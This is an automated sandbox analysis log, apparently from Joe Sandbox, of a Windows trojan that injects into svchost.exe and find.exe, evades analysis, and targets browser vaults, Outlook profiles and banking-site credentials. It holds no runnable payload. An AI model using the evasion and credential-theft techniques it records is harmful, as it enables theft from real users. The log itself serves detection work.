Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0396FF09	4_2_0396FF09
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038B9EB0	4_2_038B9EB0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038CFDC0	4_2_038CFDC0
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038B3D40	4_2_038B3D40
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03961D5A	4_2_03961D5A
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03967D73	4_2_03967D73
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0396FCF2	4_2_0396FCF2
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_03929C32	4_2_03929C32
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0360F0A7	4_2_0360F0A7
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0361532C	4_2_0361532C
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0360E383	4_2_0360E383
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0360E268	4_2_0360E268
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0360E723	4_2_0360E723
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0360D7E8	4_2_0360D7E8
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0360CA88	4_2_0360CA88
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0360E8AC	4_2_0360E8AC

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03275130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0322B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 032AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03287E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 032BF290 appears 105 times
Source: C:\Windows\SysWOW64\find.exe	Code function: String function: 0392F290 appears 105 times
Source: C:\Windows\SysWOW64\find.exe	Code function: String function: 0391EA12 appears 86 times
Source: C:\Windows\SysWOW64\find.exe	Code function: String function: 038E5130 appears 58 times
Source: C:\Windows\SysWOW64\find.exe	Code function: String function: 038F7E54 appears 111 times
Source: C:\Windows\SysWOW64\find.exe	Code function: String function: 0389B970 appears 280 times
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: String function: 0024F8A0 appears 35 times
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: String function: 00246AC0 appears 42 times
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: String function: 0023EC2F appears 68 times

Source: WDpjhC3jpq.exe, 00000000.00000003.2156121930.00000000043FD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs WDpjhC3jpq.exe
Source: WDpjhC3jpq.exe, 00000000.00000003.2156560431.0000000004253000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs WDpjhC3jpq.exe

Source: WDpjhC3jpq.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@1/1

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_0026CE7A GetLastError,FormatMessageW,

0_2_0026CE7A

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0025AB84 AdjustTokenPrivileges,CloseHandle,		0_2_0025AB84
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0025B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_0025B134

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_0026E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0026E1FD

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_00266532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_00266532

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_0027C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_0027C18C

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_0022406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_0022406B

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

File created: C:\Users\user\AppData\Local\Temp\aut912D.tmp

Jump to behavior

Source: WDpjhC3jpq.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: find.exe, 00000004.00000002.2592239930.0000000003210000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000003.2530979109.00000000031C2000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000003.2531288212.00000000031E2000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.2592239930.00000000031E2000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000003.2533415351.00000000031EE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: WDpjhC3jpq.exe	Virustotal: Detection: 66%
Source: WDpjhC3jpq.exe	ReversingLabs: Detection: 79%

Source: unknown	Process created: C:\Users\user\Desktop\WDpjhC3jpq.exe "C:\Users\user\Desktop\WDpjhC3jpq.exe"
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\WDpjhC3jpq.exe"
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"
Source: C:\Windows\SysWOW64\find.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\WDpjhC3jpq.exe"	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\find.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\find.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: WDpjhC3jpq.exe

Static file information: File size 1212928 > 1048576

Source: WDpjhC3jpq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: WDpjhC3jpq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: WDpjhC3jpq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: WDpjhC3jpq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: WDpjhC3jpq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: WDpjhC3jpq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: WDpjhC3jpq.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: find.pdb source: svchost.exe, 00000002.00000002.2351638182.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2351662035.0000000002C12000.00000004.00000020.00020000.00000000.sdmp, BrwYqDqbrpK.exe, 00000003.00000002.3374860434.0000000000D28000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BrwYqDqbrpK.exe, 00000003.00000000.2274742725.00000000001FE000.00000002.00000001.01000000.00000004.sdmp, BrwYqDqbrpK.exe, 00000008.00000002.3374382814.00000000001FE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: WDpjhC3jpq.exe, 00000000.00000003.2147999933.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, WDpjhC3jpq.exe, 00000000.00000003.2154965803.0000000004280000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2256014939.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2258259065.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2351784866.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2351784866.000000000339E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000002.2593106549.0000000003870000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000002.2593106549.0000000003A0E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.2353937621.00000000036C4000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000003.2351836228.0000000003512000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: WDpjhC3jpq.exe, 00000000.00000003.2147999933.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, WDpjhC3jpq.exe, 00000000.00000003.2154965803.0000000004280000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2256014939.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2258259065.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2351784866.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2351784866.000000000339E000.00000040.00001000.00020000.00000000.sdmp, find.exe, find.exe, 00000004.00000002.2593106549.0000000003870000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000002.2593106549.0000000003A0E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.2353937621.00000000036C4000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000003.2351836228.0000000003512000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: find.pdbGCTL source: svchost.exe, 00000002.00000002.2351638182.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2351662035.0000000002C12000.00000004.00000020.00020000.00000000.sdmp, BrwYqDqbrpK.exe, 00000003.00000002.3374860434.0000000000D28000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: find.exe, 00000004.00000002.2592239930.0000000003160000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.2593469791.0000000003E9C000.00000004.10000000.00040000.00000000.sdmp, BrwYqDqbrpK.exe, 00000008.00000002.3375830534.0000000002ACC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.3374262165.00000000071FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: find.exe, 00000004.00000002.2592239930.0000000003160000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.2593469791.0000000003E9C000.00000004.10000000.00040000.00000000.sdmp, BrwYqDqbrpK.exe, 00000008.00000002.3375830534.0000000002ACC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.3374262165.00000000071FC000.00000004.80000000.00040000.00000000.sdmp

Source: WDpjhC3jpq.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: WDpjhC3jpq.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: WDpjhC3jpq.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: WDpjhC3jpq.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: WDpjhC3jpq.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_0023E01E LoadLibraryA,GetProcAddress,

0_2_0023E01E

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0023288A push 66002323h; retn 0029h	0_2_002328E1
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_00246B05 push ecx; ret	0_2_00246B18
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_01878574 push edi; iretd	0_2_01878578
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_018784D9 push ds; iretd	0_2_018784E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004149F5 push es; ret	2_2_004149E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401865 push ecx; ret	2_2_0040186F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401870 push ecx; ret	2_2_00401891
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414969 push es; ret	2_2_004149E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004149D1 push es; ret	2_2_004149E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040333C push ss; ret	2_2_0040334A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004034C0 push eax; ret	2_2_004034C2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D4D4 push ebx; retf	2_2_0040D4D8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414CE0 push edi; retf	2_2_00414D09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D49F push esp; iretd	2_2_0040D4AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401546 push ecx; ret	2_2_00401548
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041466D push ss; iretd	2_2_0041466E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004167C7 push esi; retf	2_2_004167CE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0320225F pushad ; ret	2_2_032027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032027FA pushad ; ret	2_2_032027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032309AD push ecx; mov dword ptr [esp], ecx	2_2_032309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0320283D push eax; iretd	2_2_03202858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0320135E push eax; iretd	2_2_03201369
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	Code function: 3_2_02E8BAE5 push esi; retf	3_2_02E8BAEC
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	Code function: 3_2_02E8CE69 push eax; ret	3_2_02E8CE6B
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	Code function: 3_2_02E89FFE push edi; retf	3_2_02E8A027
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	Code function: 3_2_02E827F2 push ebx; retf	3_2_02E827F6
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	Code function: 3_2_02E827BD push esp; iretd	3_2_02E827C8
Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe	Code function: 3_2_02E93F44 push eax; iretd	3_2_02E93F45
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_0387225F pushad ; ret	4_2_038727F9
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038727FA pushad ; ret	4_2_038727F9
Source: C:\Windows\SysWOW64\find.exe	Code function: 4_2_038A09AD push ecx; mov dword ptr [esp], ecx	4_2_038A09B6

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_00288111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00288111
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0023EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0023EB42

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_0024123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0024123A

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	API/Special instruction interceptor: Address: 1877DE4
Source: C:\Windows\SysWOW64\find.exe	API/Special instruction interceptor: Address: 7FFDB442D324

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0327096E rdtsc

2_2_0327096E

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Evaded block: after key decision

graph_0-94093

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-94639

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\find.exe	API coverage: 1.5 %

Source: C:\Program Files (x86)\GPLoxfXetbylOYSYMgFKFeyAmzXDlTRkRVqgCWIslELnnxfGN\BrwYqDqbrpK.exe TID: 6012

Thread sleep time: -80000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_00266CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00266CA9
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_002660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_002660DD
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_002663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_002663F9
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0026EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0026EB60
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0026F56F FindFirstFileW,FindClose,	0_2_0026F56F
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0026F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0026F5FA
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_00271B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00271B2F
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_00271C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00271C8A
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_00271F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00271F94

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe

Code function: 0_2_0023DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0023DDC0

Source: 122-fVJ8.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 122-fVJ8.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: 122-fVJ8.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 122-fVJ8.4.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: 122-fVJ8.4.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 122-fVJ8.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 122-fVJ8.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 122-fVJ8.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 122-fVJ8.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 122-fVJ8.4.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: 122-fVJ8.4.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: BrwYqDqbrpK.exe, 00000008.00000002.3375266493.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
Source: 122-fVJ8.4.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: WDpjhC3jpq.exe, 00000000.00000002.2157741359.0000000001935000.00000004.00000020.00020000.00000000.sdmp, WDpjhC3jpq.exe, 00000000.00000003.2132926013.00000000018C1000.00000004.00000020.00020000.00000000.sdmp, WDpjhC3jpq.exe, 00000000.00000003.2133040122.0000000001935000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: QeMu6
